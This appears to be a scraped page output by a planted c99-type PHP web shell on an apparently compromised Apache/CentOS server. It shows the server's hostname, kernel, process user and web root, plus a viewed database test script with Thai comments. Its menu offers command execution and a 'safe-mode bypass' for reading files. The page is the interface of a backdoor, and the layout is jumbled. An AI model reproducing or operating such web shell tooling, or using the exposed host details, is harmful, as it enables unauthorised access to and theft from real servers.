Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/ws_standard_on_mis/ drwxr-xr-x |
Viewing file: testdatabase.php (4.6 KB) -rw-r--r-- Select action/file-type: (+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) | /* กำหนดค่า DSN หากฐานข้อมูลต้องการ User และ Password ก็ให้กำหนดด้วย เช่นจะใช้ DSN ชื่อ phptest ส่วน user และ password ไม่ใช้ก็ดังนี้ $dsn="asset"; $uid=""; $pwd=""; ฟังก์ชันติดต่อ ต้องการให้ผ่านค่าทั้ง 3 เข้าไป และจะคืนค่าออกมา เราก็รับค่าที่คืนออกมาลงตัวแปร เช่นลงที่ hdn โดยที่หากติดต่อสำเร็จ hdn จะมีค่าเป็นหมายเลขบวกเพื่อนำใชกับฟังก์ชันอื่นต่อไป หากติดต่อไม่ได้ hdn จะเป็นเท็จ ก็ควรจะมีการตรวจสอบว่า เป็นเท็จหรือไม่ หากใช่ก็จะได้ให้ลิกงานเลย แต่ในที่นี้ผมไม่ได้เขียนเอาไว้ ให้ทำเองครับ $hdn = odbc_connect($dsn,$uid,$pwd); // กำหนดคำสั่ง SQL ที่จะใช้ และใช้ $sql="select * from TAsset"; $fdn= odbc_exec($hdn, $sql); //หาจำนวนคอลัมน์และนำชื่อคอลัมน์ออกมาแสดงไปทีละคอลัมน์ $nf= odbc_num_fields($fdn); echo "
//-------------------------------------โครงการ $dsn_name = "project"; $username =""; $password =""; $connect= odbc_connect($dsn_name, $username, $password) or die("ติดต่อ DSN ไม่ได้"); //$sql = "SELECT * FROM TEmployee,TWorkStatus,TPosScale WHERE (TEmployee.work_status=TWorkStatus.id) and (TEmployee.Id=TPosScale.TEmp_id) and (TWorkStatus.id = '0') and (TEmployee.id like '01%') and (TPosScale.TDep_id = '0702')"; //$sql = "SELECT * FROM TEmployee,TWorkStatus,TPosScale WHERE (TEmployee.work_status=TWorkStatus.id) and (TEmployee.Id=TPosScale.TEmp_id) and (TWorkStatus.id = '0') and (TEmployee.id like '01%') and (TPosScale.TDep_id = '0702')"; $sql = "SELECT * FROM TProject, TTypeProject, TTypeProjectSub WHERE (TProject.Type_id=TTypeProject.id) and (TTypeProject.id=TTypeProjectSub.Type_id) "; //$sql = "SELECT * FROM TProject"; $execute = odbc_exec($connect, $sql) or die ("เอ็กซิคิวส์คำสั่งไม่ได้"); $num = odbc_num_rows($execute); ?>
bool(false) |
:: Command execute :: | |
:: Shadow's tricks :D :: | |
Useful Commands
|
:: Preddy's tricks :D :: | |
Php Safe-Mode Bypass (Read Files)
|
--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0061 ]-- |